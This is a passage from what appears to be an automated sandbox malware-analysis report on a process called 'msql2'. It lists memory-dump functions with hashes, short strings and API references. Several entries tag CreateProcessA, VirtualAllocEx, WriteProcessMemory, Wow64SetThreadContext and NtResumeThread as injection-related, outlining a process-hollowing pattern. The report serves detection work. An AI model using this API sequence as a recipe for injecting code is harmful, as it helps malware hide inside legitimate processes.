API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e9b9ebbeab11a82b86445d12dd82bf6c66de16d6e659dd7f8c9bbc1f7015e3fb
Instruction ID: c76627f6b2e2954890b1555c586d749d47194bbb0cf9111602c1c224572bba3a
Opcode Fuzzy Hash: e9b9ebbeab11a82b86445d12dd82bf6c66de16d6e659dd7f8c9bbc1f7015e3fb
Instruction Fuzzy Hash: AB4197B9D00258DFCF10CFAAD984ADEFBB5BB49310F14902AE918B7210D735A945CF68

Function 060FFC0A Relevance: 1.6, APIs: 1, Instructions: 85nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 060FFC9E

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ddff4b58395a0ee68c2643fb2123e119bdf96be3c528500fc3e244a9597a6b60
Instruction ID: 192226b0043bb3a823a3e5c46019fc695e33e55e78f1280dd6e8c3a04876f69d
Opcode Fuzzy Hash: ddff4b58395a0ee68c2643fb2123e119bdf96be3c528500fc3e244a9597a6b60
Instruction Fuzzy Hash: A631AAB9D012299FCB10CFA9D980ADEFBF5BB49310F24942AE914B7210C735A945CFA4

Function 060FFC10 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 060FFC9E

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ea82e34e37cd2cb9bd5e89190565aad48eaeae34929b0afd1c336090201d0064
Instruction ID: 5e68c465de88f3ff33c15bba1a1eadd944a4536b7f0e01f7e538b85979141189
Opcode Fuzzy Hash: ea82e34e37cd2cb9bd5e89190565aad48eaeae34929b0afd1c336090201d0064
Instruction Fuzzy Hash: 8D31A9B5D012299FCB10CFAAD980ADEFBF5BB49310F20942AE914B7310C735A945CF94

Function 060A7390 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

Te^q, xrefs: 060A7518

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 3f6f457a6c1ce00ec579976d7d03176b67c66ae56981dc099baf7041e1af0afd
Instruction ID: 9cc4b42d03c2fe9ce8d7166c538884c6ada5de6205d65087e8a183591b26573b
Opcode Fuzzy Hash: 3f6f457a6c1ce00ec579976d7d03176b67c66ae56981dc099baf7041e1af0afd
Instruction Fuzzy Hash: F3A10478E44218CFEB94CFA9D884BADBBF2FB89344F108069D409AB355DB715986CF40

Function 060A7387 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

Te^q, xrefs: 060A7518

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 9ae8be995fc6363396abcb5ae033b08ccec4d0828e8954c3fa64a8a28d8ca772
Instruction ID: 492f3363c504cc4d470e2e177020223cb4fbc14d15f61be79729291f916ebc93
Opcode Fuzzy Hash: 9ae8be995fc6363396abcb5ae033b08ccec4d0828e8954c3fa64a8a28d8ca772
Instruction Fuzzy Hash: F9A1F478E41218CFDB94CFA9D884B9DBBF2FB89344F148069D409AB355DB715986CF40

Function 00F7E648 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1867234639.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f70000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29854ca49870050ad02e0bff39ad59a10bdabc0e7dc8b3346715efb7074b74ba
Instruction ID: 31653cdccab679017aa86076d80034b3d591ba7583afca8791593039001b57e0
Opcode Fuzzy Hash: 29854ca49870050ad02e0bff39ad59a10bdabc0e7dc8b3346715efb7074b74ba
Instruction Fuzzy Hash: 2DD1DFB5D052688FDB24DFA9C944BD9BBF5FB5D300F1080EAE409AB295C7749A88DF01

Function 00F72960 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1867234639.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f70000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91232d32f8fd2f6e9ed756983da383618f2e404b1f887d268991935428cd24a9
Instruction ID: 27d07c24efc16e0e293dc8cdcf829b226b1d2c1947fd03eff59a7896b753ff61
Opcode Fuzzy Hash: 91232d32f8fd2f6e9ed756983da383618f2e404b1f887d268991935428cd24a9
Instruction Fuzzy Hash: ED71AF34A04104CFEB94DF19D988BAE77F2FB88310F29C166D509972A5CB755C86EF02

Function 060A06CA Relevance: 3.8, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<, xrefs: 060A1614
!, xrefs: 060A1A3A
5, xrefs: 060A1A66

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID: !$5$<
API String ID: 0-3925111706
Opcode ID: 094dcc076470ccfc2b058b412ceb3137dfab01270c5ad7541af178192bce57da
Instruction ID: f0a0082f5be1c8181ce7da4400b8c39b7ee22c765fe0189f82607d47c6c0c4bf
Opcode Fuzzy Hash: 094dcc076470ccfc2b058b412ceb3137dfab01270c5ad7541af178192bce57da
Instruction Fuzzy Hash: A9417F74D4132D8FDBA4AF60C8887EDBBB2AF08359F1455EAD20AB6250C7780AC4CF55

Function 060EBC90 Relevance: 2.6, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

3, xrefs: 060EC8BB
&, xrefs: 060EBD0D

Memory Dump Source

Source File: 00000002.00000002.1889065916.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60e0000_msql2.jbxd

Similarity

API ID:
String ID: &$3
API String ID: 0-2377737200
Opcode ID: 8ed3240939460fbf6df4a20438ac898a2e073155f8b4c8828f42d6a1dce59f2c
Instruction ID: fb721d1c01f2cd97128f97b631fc747da728a8592c17873868f92ae3ed3a7538
Opcode Fuzzy Hash: 8ed3240939460fbf6df4a20438ac898a2e073155f8b4c8828f42d6a1dce59f2c
Instruction Fuzzy Hash: 1C61AB75941228CFEBA0CF58CA84BE9BBF1AB49305F0491EAD509B3290D7B59AC5CF50

Function 060EBC08 Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

/, xrefs: 060EC54C
9, xrefs: 060EBC12

Memory Dump Source

Source File: 00000002.00000002.1889065916.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60e0000_msql2.jbxd

Similarity

API ID:
String ID: /$9
API String ID: 0-1656598881
Opcode ID: 9b89584c27abe8cd3057235a3f888647ac1b6d70fabceef126a781cf5b316f0d
Instruction ID: ca4df2148708fad58056495536562c4f523e5befd45dcce128cfc367b29a503e
Opcode Fuzzy Hash: 9b89584c27abe8cd3057235a3f888647ac1b6d70fabceef126a781cf5b316f0d
Instruction Fuzzy Hash: 0C51CD75981228CFEBA0CF58D948BE9BBF1BB49305F0090EAD019B3290DB758AC5CF50

Function 060EC70E Relevance: 2.6, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

!, xrefs: 060EBB50
#, xrefs: 060EC71B

Memory Dump Source

Source File: 00000002.00000002.1889065916.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60e0000_msql2.jbxd

Similarity

API ID:
String ID: !$#
API String ID: 0-2504090897
Opcode ID: 16b970d8d3f793ea5f8ac20f4740b60d859a27a8cb81f7b57fa32d55e17b57c0
Instruction ID: 1f82e3017164b5ec25a32f4e0fd0b697997ae620ee1b1da5ef86b792ca974f71
Opcode Fuzzy Hash: 16b970d8d3f793ea5f8ac20f4740b60d859a27a8cb81f7b57fa32d55e17b57c0
Instruction Fuzzy Hash: 9351CE75980228CFEBA0CF58D984BA9BBF1BB49305F0491EAC01DB3690D7759AC9CF50

Function 060A1249 Relevance: 2.5, Strings: 2, Instructions: 25COMMON

Download Yara Rule

Strings

?, xrefs: 060A1282
b, xrefs: 060A1256

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID: ?$b
API String ID: 0-2183305837
Opcode ID: 781f619afe364657079ec10fc77bd9d13f117cc6b324a982392ba490fb055337
Instruction ID: c86200e3347d8e4cecbfeb768a470773a4f3223fb76d7a58a6c6d3e0d4f62c23
Opcode Fuzzy Hash: 781f619afe364657079ec10fc77bd9d13f117cc6b324a982392ba490fb055337
Instruction Fuzzy Hash: 33F09274C8122DCEEBA59FA4C8887EDBBB1AB08399F1495A9C10A72241C7780AD4CF55

Function 060FEF74 Relevance: 1.8, APIs: 1, Instructions: 265processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060FF1E7

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4c0879c3b1cd563abab70143696e24c04cc3fb91a28490695dacfb1fe0e02c5e
Instruction ID: 175ac1c98dd795c35a14e41d46a55df804a08a24a7328ee0b8e91346694e261b
Opcode Fuzzy Hash: 4c0879c3b1cd563abab70143696e24c04cc3fb91a28490695dacfb1fe0e02c5e
Instruction Fuzzy Hash: F1A123B5D10259CFDBA0CFA8C8417EEBBF1BB49300F14916AE958B7240DB749985CF85

Function 060FEF80 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 060FF1E7

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: dc59416f448a0e4a2fe7305ab782a81128d554b8a18925113f2fbad5abe2968d
Instruction ID: 7f8dd87a6bd79048e7c0552d77fbafd139ffe0a9881b07e2222a794b72bb0ef3
Opcode Fuzzy Hash: dc59416f448a0e4a2fe7305ab782a81128d554b8a18925113f2fbad5abe2968d
Instruction Fuzzy Hash: D5A134B5D10259CFDBA0CFA9C8817EEBBF1BB09300F14916AE958B7240DB749985CF85

Function 060FF9F0 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 060FFACB

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 13e780ff3fdac04d574b693a0522a4056f3d7049d2699ed618013cc249ad5983
Instruction ID: eb870322702280a910080da4bfbd2ead92e3e7ed2f46d7057bbd2ce9a72b29a1
Opcode Fuzzy Hash: 13e780ff3fdac04d574b693a0522a4056f3d7049d2699ed618013cc249ad5983
Instruction Fuzzy Hash: 6941BAB5D012589FCF10CFA9D984AEEFBF1BB49310F24902AE818B7210D734AA45CF64

Function 060FF9F8 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 060FFACB

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7868ee54f5bfe54a9e9202d9fe695dd59c843f14ed00d5ed9724a8f421531f0b
Instruction ID: 95c8aa82a9b43c6d86be4469215b3c66cc8c511aa35e98da9765d9be0831e0c4
Opcode Fuzzy Hash: 7868ee54f5bfe54a9e9202d9fe695dd59c843f14ed00d5ed9724a8f421531f0b
Instruction Fuzzy Hash: 0341A8B5D012599FCF10CFA9D984AEEFBF1BB49310F24942AE818B7210D734AA45CF64

Function 060FF890 Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060FF942

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 54bf47f4f0b3cf4ec4c668461e1645be269f5a254d22b8e7e2b74c979cd0a283
Instruction ID: 67bdf9414623d4c1670dc72c7d8c55b162d437839fcd3ee4740216fdddc3b2da
Opcode Fuzzy Hash: 54bf47f4f0b3cf4ec4c668461e1645be269f5a254d22b8e7e2b74c979cd0a283
Instruction Fuzzy Hash: C23196B9D042599FCF10CFA9D980ADEBBB1FB49320F14A42AE815B7210D735A946CF58

Function 060FF898 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 060FF942

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 44848bb71d127827893cf0d3eb6134e4a965e66dd3c6c30a40a7dda1a7673827
Instruction ID: b488ba1ca57c715a64c9f48704c1974544f051de4ee7243ddf62e7f5c616eead
Opcode Fuzzy Hash: 44848bb71d127827893cf0d3eb6134e4a965e66dd3c6c30a40a7dda1a7673827
Instruction Fuzzy Hash: 603195B9D042589FCF10CFA9D980ADEFBB1FB49320F10A42AE814B7210D735A945CF68

Function 060FF330 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 060FF3E7

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d4644fef78b88702d942e1de8621f275edce91cb1699da1f1ad13e21f23ae076
Instruction ID: b4e05c0fe27a10864ed809acfb42e08f2d1b46c50791586beedcaed755f78616
Opcode Fuzzy Hash: d4644fef78b88702d942e1de8621f275edce91cb1699da1f1ad13e21f23ae076
Instruction Fuzzy Hash: 2F41CBB5D01259DFCB10CFA9D984AEEBFF1BB48310F24802AE409B7200C738A985CF54

Function 0611D5E0 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0611D684

Memory Dump Source

Source File: 00000002.00000002.1889233795.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6110000_msql2.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 29e1a00a54ac245c165ff9f7b3bbbbcec9051f4dfca8cf49f9e85fa2906a17c0
Instruction ID: 6eb8f833a0f8601b3a37474c6313c08bbc8448c10fec4a0ae3caaedd74f295b4
Opcode Fuzzy Hash: 29e1a00a54ac245c165ff9f7b3bbbbcec9051f4dfca8cf49f9e85fa2906a17c0
Instruction Fuzzy Hash: 193199B5D052589FCF14CFA9E980ADEFBB1BF49310F14942AE818BB210D735A945CF98

Function 060FF338 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 060FF3E7

Memory Dump Source

Source File: 00000002.00000002.1889134451.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60f0000_msql2.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 58ccb777213ecd38077afb94cfa73650626fd85f83f70b416413c9aa92e420f0
Instruction ID: 8b01b45b7a29ca79eaeefe4b64d20c8ab37ebb794045565379c12902dc990c8e
Opcode Fuzzy Hash: 58ccb777213ecd38077afb94cfa73650626fd85f83f70b416413c9aa92e420f0
Instruction Fuzzy Hash: 6531A9B5D012589FCB10CFAAD984AEEFBF1BB49310F24802AE418B7240C738A985CF54

Function 00F7C1C8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

TJcq, xrefs: 00F7C2D1

Memory Dump Source

Source File: 00000002.00000002.1867234639.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f70000_msql2.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: 9629ce04523bcaeab0248e4934f425b550efd6571d967c294c8c9bb03f61e7cf
Instruction ID: 952ef03fe2a256267b0873d3b556f3b1580a1e9dce0410d56ac87045b83afb7b
Opcode Fuzzy Hash: 9629ce04523bcaeab0248e4934f425b550efd6571d967c294c8c9bb03f61e7cf
Instruction Fuzzy Hash: 1E51D174E00208DFCB44DFA9D888AADBBF1FF89314F10806AE819A7361DB745945DF95

Function 060EC55B Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

,, xrefs: 060EC5A6

Memory Dump Source

Source File: 00000002.00000002.1889065916.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60e0000_msql2.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: edb1c22beccfa7daf1d542e8eb6d9f08e21138664e662f466234a9e6b195dce8
Instruction ID: c4c955fe64e7aaccb5c8b376e261ca000529bf3f83b5c8d410513eeede6cef58
Opcode Fuzzy Hash: edb1c22beccfa7daf1d542e8eb6d9f08e21138664e662f466234a9e6b195dce8
Instruction Fuzzy Hash: 2B51CE76941229CFEBA0CF58C948BE9BBB1EB49305F1491E6D009B3290DB759AC9CF50

Function 0611E7A8 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0611E847

Memory Dump Source

Source File: 00000002.00000002.1889233795.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6110000_msql2.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e70ac61af7741096018904801f3d758b88a6e4e30c84f429a37fc22a9833643a
Instruction ID: e086544bcff4123022bd1dc374cd429a4e3c8f014bf651674b88d8d021ac505b
Opcode Fuzzy Hash: e70ac61af7741096018904801f3d758b88a6e4e30c84f429a37fc22a9833643a
Instruction Fuzzy Hash: 213198B9D00258DFCF14CFA9D980ADEFBB1BB49310F14942AE814BB210D735A945CF98

Function 060AAFE1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

O, xrefs: 060AB0AD

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: de30e1280a617451ba375c10430af485bf00f38cb0275f803b04630dc6853f8e
Instruction ID: 7f29d77ffe6ee4c3dd8bdd93bbbcf630a885b05cf7afa312246a06b0f1a1c013
Opcode Fuzzy Hash: de30e1280a617451ba375c10430af485bf00f38cb0275f803b04630dc6853f8e
Instruction Fuzzy Hash: 0221BF74A422289FEBA5DF64C954B9ABBF5BF49305F0060E9D50AE7290DB309F80CF41

Function 060EC4D1 Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

/, xrefs: 060EC54C

Memory Dump Source

Source File: 00000002.00000002.1889065916.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60e0000_msql2.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: eac4e8133cfc7dbbe94038f77737f5914559fefc0926f88fe5d8a78d12e88972
Instruction ID: d40de77d35846ffdbdcb1890ed6c589cc7af1f8b4adf5532754840eb5de8f111
Opcode Fuzzy Hash: eac4e8133cfc7dbbe94038f77737f5914559fefc0926f88fe5d8a78d12e88972
Instruction Fuzzy Hash: C1019D74E00229AFDB64DF64DA55BECBBB2BF49300F5040E9A609A7290DF701E819F41

Function 060A1C27 Relevance: 1.3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

Strings

P, xrefs: 060A1C7B

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 4e42abdf29d361d6aa8f67cd9abc6bcbe251ff2a6e6403e3f87273248693a74d
Instruction ID: 963c11fef248c6c44b98589eee132e1d0aa23f0763f6fdb7a8cc3c02a3b4bdc1
Opcode Fuzzy Hash: 4e42abdf29d361d6aa8f67cd9abc6bcbe251ff2a6e6403e3f87273248693a74d
Instruction Fuzzy Hash: 3EF06C74D4622C8FDBA0DFA4C9947DDBBB1AB48359F1015EAD209A7240C7355BC4CF91

Function 060AC89E Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

M, xrefs: 060AC8DD

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: ec6d8f01113d69c0cc64fd6dd30995bca74dfb5164291e0837732de90b9231fe
Instruction ID: 07b2baf755e6e4802903c074d2913f0c1a79b0f11e1703ed390bcbe57bec645f
Opcode Fuzzy Hash: ec6d8f01113d69c0cc64fd6dd30995bca74dfb5164291e0837732de90b9231fe
Instruction Fuzzy Hash: 1EE0DFB48053149FCB40AF28E8087897BF5FF42308F2042E6C009AB161D73A4A8ACF95

Function 060A84D3 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

M, xrefs: 060AC8DD

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 658b159b718ae673d276e14ba6e6e746e67d32495b9635f0704c4b5e43b8d3fc
Instruction ID: 60ef42e461271ab9599175be90cac655fd8b3a3823f21e6420e745a3a303bdde
Opcode Fuzzy Hash: 658b159b718ae673d276e14ba6e6e746e67d32495b9635f0704c4b5e43b8d3fc
Instruction Fuzzy Hash: 08D05EF8A503288FDB40EF64D84475E7BF2FB85344F1046A7C00AAB358DB758A898F85

Function 060EA482 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1889065916.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60e0000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee5d6bab818a247877419a17c1d6733dab3ef60451dbffbb8812f47d0f6193da
Instruction ID: 41a88a3306a092417624b26f7b77f937bb5d8724fc2bb7282f42f256e7371a19
Opcode Fuzzy Hash: ee5d6bab818a247877419a17c1d6733dab3ef60451dbffbb8812f47d0f6193da
Instruction Fuzzy Hash: DDB10574E45218CFDBA4DF68D884BADBBF2FB8A304F1081A9D419A7295DB309D85CF41

Function 060E1EF8 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1889065916.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60e0000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d94dc7f408dbcb1257bf8b093cc06c64e8cbadf373824a2d2197375e3cc0ad44
Instruction ID: 7aa558cb11ce6a3b7a5ac19536968d0c2f9eb021d3b4554aafd141d56e4f4350
Opcode Fuzzy Hash: d94dc7f408dbcb1257bf8b093cc06c64e8cbadf373824a2d2197375e3cc0ad44
Instruction Fuzzy Hash: EB91F374D81218CFDB94DFA4C954BEDBBF2EB89304F50809AD409AB295CB759A89CF40

Function 060A6CA8 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc3a6e0e7f194263dc58029ae9742c82aea2ec7c756ecb734afdce6a822867b2
Instruction ID: 401385904516e0f4f827105d882ead5b03ffc414c9b3e61f545af8cc97cba62c
Opcode Fuzzy Hash: fc3a6e0e7f194263dc58029ae9742c82aea2ec7c756ecb734afdce6a822867b2
Instruction Fuzzy Hash: 4871FF70D51208CFDB84CFE8D944BAEBBF2FB49388F24802AD415AB250D7765A85CF91

Function 060A6CB8 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1888719255.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60a0000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a465cac4283f6a96d93d14dc41c4a38a85725058fe07ce506e04ea8f758abd
Instruction ID: 6ac4a83a96ee1ee4f4ce8a88a37acf823a1be8e6b88a8d91c8a34bad14fdbe77
Opcode Fuzzy Hash: 67a465cac4283f6a96d93d14dc41c4a38a85725058fe07ce506e04ea8f758abd
Instruction Fuzzy Hash: ED710070D51208CFDB84CFE9D944BAEBBF2FB49388F24802AD416A7250D7765A85CF91

Function 060E1F7E Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1889065916.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_60e0000_msql2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117bc359615085802cd57d80e75f4ab92c5fabc63ac66d3b090b25399e76a206
Instruction ID: 40cd7c509551d462e81a535e8f78d37c767505c6a96ea61078239c57b8abd0bd
Opcode Fuzzy Hash: 117bc359615085802cd57d80e75f4ab92c5fabc63ac66d3b090b25399e76a206
Instruction Fuzzy Hash: F971E474D81218CFDF94DFA4C544BEDBBF1EB89304F508099D409AB295CB795A89CF41

Function 060A67AC Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

